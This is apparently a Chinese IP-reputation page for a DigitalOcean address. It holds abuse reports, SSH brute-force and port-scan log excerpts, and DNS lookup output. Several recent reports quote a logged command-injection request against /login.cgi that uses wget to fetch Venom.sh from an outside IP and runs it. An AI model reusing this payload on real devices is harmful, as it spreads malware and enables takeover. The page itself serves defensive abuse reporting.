157.230.245.16

基本信息:

城市(city): unknown

省份(region): unknown

国家(country): Singapore

运营商(isp): DigitalOcean LLC

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): Data Center/Web Hosting/Transit

用户上报:

点此参与IP信息讨论

类型	评论内容	时间
attackspam	[N1.H1.VM1] Port Scanner Detected Blocked by UFW	2020-10-08 02:42:17
attackbots	TCP (SYN) 157.230.245.16:60000 -> port 25, len 44	2020-10-07 18:55:49

相同子网IP讨论:

IP	类型	评论内容	时间
157.230.245.91	attackspambots	TCP (SYN) 157.230.245.91:57357 -> port 5336, len 44	2020-10-07 05:46:38
157.230.245.91	attack	TCP port : 1517	2020-10-06 21:58:40
157.230.245.91	attack	Port scan denied	2020-10-06 13:41:40
157.230.245.91	attackspambots	[N10.H2.VM2] Port Scanner Detected Blocked by UFW	2020-10-04 04:53:52
157.230.245.91	attackspam	Invalid user switch from 157.230.245.91 port 43234	2020-10-03 21:02:36
157.230.245.91	attackspambots	Failed password for invalid user kost from 157.230.245.91 port 46704 ssh2	2020-10-03 12:27:20
157.230.245.91	attack	srv02 Mass scanning activity detected Target: 22397 ..	2020-10-03 07:08:46
157.230.245.243	attackbotsspam	TCP port : 44022	2020-08-30 19:09:17
157.230.245.91	attackbotsspam	2020-08-28T13:26:16.134281paragon sshd[582516]: Failed password for root from 157.230.245.91 port 49490 ssh2 2020-08-28T13:30:25.315429paragon sshd[582864]: Invalid user admin from 157.230.245.91 port 54246 2020-08-28T13:30:25.317880paragon sshd[582864]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.245.91 2020-08-28T13:30:25.315429paragon sshd[582864]: Invalid user admin from 157.230.245.91 port 54246 2020-08-28T13:30:27.440821paragon sshd[582864]: Failed password for invalid user admin from 157.230.245.91 port 54246 ssh2 ...	2020-08-28 18:19:30
157.230.245.243	attack	Port scan denied	2020-08-28 03:52:09
157.230.245.243	attackspambots	Port Scan ...	2020-08-27 07:50:09
157.230.245.91	attackspam	2020-08-23T16:38:09.021082mail.standpoint.com.ua sshd[14213]: Failed password for root from 157.230.245.91 port 49032 ssh2 2020-08-23T16:42:47.491555mail.standpoint.com.ua sshd[14878]: Invalid user matias from 157.230.245.91 port 58550 2020-08-23T16:42:47.495208mail.standpoint.com.ua sshd[14878]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.245.91 2020-08-23T16:42:47.491555mail.standpoint.com.ua sshd[14878]: Invalid user matias from 157.230.245.91 port 58550 2020-08-23T16:42:49.603466mail.standpoint.com.ua sshd[14878]: Failed password for invalid user matias from 157.230.245.91 port 58550 ssh2 ...	2020-08-23 22:46:47
157.230.245.91	attackspambots	2020-08-20T01:20:51.177121mail.standpoint.com.ua sshd[31781]: Invalid user avl from 157.230.245.91 port 36964 2020-08-20T01:20:51.180529mail.standpoint.com.ua sshd[31781]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.245.91 2020-08-20T01:20:51.177121mail.standpoint.com.ua sshd[31781]: Invalid user avl from 157.230.245.91 port 36964 2020-08-20T01:20:53.055408mail.standpoint.com.ua sshd[31781]: Failed password for invalid user avl from 157.230.245.91 port 36964 ssh2 2020-08-20T01:25:17.294076mail.standpoint.com.ua sshd[32438]: Invalid user hugo from 157.230.245.91 port 47064 ...	2020-08-20 07:23:03
157.230.245.91	attack	Aug 16 22:32:56 web1 sshd\[30543\]: Invalid user dmb from 157.230.245.91 Aug 16 22:32:56 web1 sshd\[30543\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.245.91 Aug 16 22:32:58 web1 sshd\[30543\]: Failed password for invalid user dmb from 157.230.245.91 port 39514 ssh2 Aug 16 22:34:28 web1 sshd\[30613\]: Invalid user b from 157.230.245.91 Aug 16 22:34:28 web1 sshd\[30613\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.245.91	2020-08-17 04:40:53
157.230.245.67	attack	157.230.245.67 - - [04/Aug/2020:00:24:38 +0100] "POST /wp-login.php HTTP/1.1" 200 1950 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 157.230.245.67 - - [04/Aug/2020:00:24:40 +0100] "POST /xmlrpc.php HTTP/1.1" 200 247 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" 157.230.245.67 - - [04/Aug/2020:00:39:56 +0100] "POST /wp-login.php HTTP/1.1" 200 1950 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0" ...	2020-08-04 08:00:53

WHOIS信息:

DIG信息:

; <<>> DiG 9.10.3-P4-Ubuntu <<>> 157.230.245.16
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 18777
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
;; QUESTION SECTION:
;157.230.245.16.			IN	A

;; AUTHORITY SECTION:
.			127	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2020100700 1800 900 604800 86400

;; Query time: 59 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Wed Oct 07 18:55:46 CST 2020
;; MSG SIZE  rcvd: 118

HOST信息:

Host 16.245.230.157.in-addr.arpa. not found: 3(NXDOMAIN)

NSLOOKUP信息:

Server:		183.60.83.19
Address:	183.60.83.19#53

** server can't find 16.245.230.157.in-addr.arpa: NXDOMAIN

最新评论:

IP	类型	评论内容	时间
192.241.183.220	attackbots	Dec 23 08:31:36 IngegnereFirenze sshd[13855]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.241.183.220 user=root ...	2019-12-23 19:52:48
156.218.108.35	attackspambots	1 attack on wget probes like: 156.218.108.35 - - [22/Dec/2019:17:27:36 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11	2019-12-23 20:29:29
156.220.86.65	attackbotsspam	1 attack on wget probes like: 156.220.86.65 - - [22/Dec/2019:06:05:48 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11	2019-12-23 20:19:57
221.120.236.50	attackspam	Dec 23 02:13:44 wbs sshd\[11295\]: Invalid user silas from 221.120.236.50 Dec 23 02:13:44 wbs sshd\[11295\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=221.120.236.50 Dec 23 02:13:46 wbs sshd\[11295\]: Failed password for invalid user silas from 221.120.236.50 port 25425 ssh2 Dec 23 02:22:09 wbs sshd\[12103\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=221.120.236.50 user=root Dec 23 02:22:11 wbs sshd\[12103\]: Failed password for root from 221.120.236.50 port 14210 ssh2	2019-12-23 20:34:33
165.22.78.222	attackspambots	Dec 23 09:58:59 dedicated sshd[32592]: Invalid user dovecot000 from 165.22.78.222 port 52630	2019-12-23 19:57:11
41.235.251.173	attackbots	1 attack on wget probes like: 41.235.251.173 - - [22/Dec/2019:12:55:17 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11	2019-12-23 20:31:30
204.48.22.21	attackbotsspam	Dec 23 11:49:04 MainVPS sshd[19971]: Invalid user www from 204.48.22.21 port 58566 Dec 23 11:49:04 MainVPS sshd[19971]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=204.48.22.21 Dec 23 11:49:04 MainVPS sshd[19971]: Invalid user www from 204.48.22.21 port 58566 Dec 23 11:49:06 MainVPS sshd[19971]: Failed password for invalid user www from 204.48.22.21 port 58566 ssh2 Dec 23 11:56:16 MainVPS sshd[1015]: Invalid user jinta from 204.48.22.21 port 36310 ...	2019-12-23 20:17:01
218.92.0.145	attackbotsspam	Dec 23 11:38:23 marvibiene sshd[4642]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.145 user=root Dec 23 11:38:24 marvibiene sshd[4642]: Failed password for root from 218.92.0.145 port 56592 ssh2 Dec 23 11:38:27 marvibiene sshd[4642]: Failed password for root from 218.92.0.145 port 56592 ssh2 Dec 23 11:38:23 marvibiene sshd[4642]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.145 user=root Dec 23 11:38:24 marvibiene sshd[4642]: Failed password for root from 218.92.0.145 port 56592 ssh2 Dec 23 11:38:27 marvibiene sshd[4642]: Failed password for root from 218.92.0.145 port 56592 ssh2 ...	2019-12-23 20:16:36
188.214.135.21	attackbotsspam	Dec 23 12:47:54 debian-2gb-nbg1-2 kernel: \[754420.098800\] \[UFW BLOCK\] IN=eth0 OUT= MAC=96:00:00:0e:18:f4:d2:74:7f:6e:37:e3:08:00 SRC=188.214.135.21 DST=195.201.40.59 LEN=40 TOS=0x00 PREC=0x00 TTL=241 ID=20821 PROTO=TCP SPT=53075 DPT=3338 WINDOW=1024 RES=0x00 SYN URGP=0	2019-12-23 20:08:14
78.43.55.100	attack	Dec 23 11:37:19 h2177944 sshd\[20775\]: Invalid user luzia from 78.43.55.100 port 58735 Dec 23 11:37:19 h2177944 sshd\[20775\]: pam_unix$sshd:auth$: authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=78.43.55.100 Dec 23 11:37:22 h2177944 sshd\[20775\]: Failed password for invalid user luzia from 78.43.55.100 port 58735 ssh2 Dec 23 11:46:31 h2177944 sshd\[21199\]: Invalid user londerville from 78.43.55.100 port 32893 ...	2019-12-23 20:06:34
201.103.105.237	attack	1577082345 - 12/23/2019 07:25:45 Host: 201.103.105.237/201.103.105.237 Port: 445 TCP Blocked	2019-12-23 20:07:18
185.136.163.107	attackspambots	2019-12-23 05:28:07.425 [7065] SMTP protocol error in "AUTH LOGIN" H=(ADMIN) [185.136.163.107]:50821 AUTH command used when not advertised	2019-12-23 20:09:45
41.37.101.38	attack	1 attack on wget probes like: 41.37.101.38 - - [22/Dec/2019:19:56:52 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11	2019-12-23 20:00:01
156.211.233.242	attackspambots	1 attack on wget probes like: 156.211.233.242 - - [22/Dec/2019:07:58:01 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11	2019-12-23 20:32:22
178.128.81.60	attackbots	Lines containing failures of 178.128.81.60 Dec 23 09:15:05 cdb sshd[18135]: Invalid user merlina from 178.128.81.60 port 33022 Dec 23 09:15:05 cdb sshd[18135]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=178.128.81.60 Dec 23 09:15:07 cdb sshd[18135]: Failed password for invalid user merlina from 178.128.81.60 port 33022 ssh2 Dec 23 09:15:07 cdb sshd[18135]: Received disconnect from 178.128.81.60 port 33022:11: Bye Bye [preauth] Dec 23 09:15:07 cdb sshd[18135]: Disconnected from invalid user merlina 178.128.81.60 port 33022 [preauth] Dec 23 09:24:40 cdb sshd[18981]: Invalid user mysql from 178.128.81.60 port 43322 Dec 23 09:24:40 cdb sshd[18981]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=178.128.81.60 ........ ----------------------------------------------- https://www.blocklist.de/en/view.html?ip=178.128.81.60	2019-12-23 20:24:29

最近上报的IP列表

122.226.167.246	198.12.157.28	185.191.171.21	188.82.92.144
188.166.225.17	176.32.34.102	31.171.152.131	122.70.178.5
102.137.59.183	116.86.157.34	23.255.132.212	119.148.191.48
17.214.48.248	37.49.225.199	62.170.238.213	80.162.246.200
121.104.8.251	115.96.140.91	38.119.134.178	178.128.187.109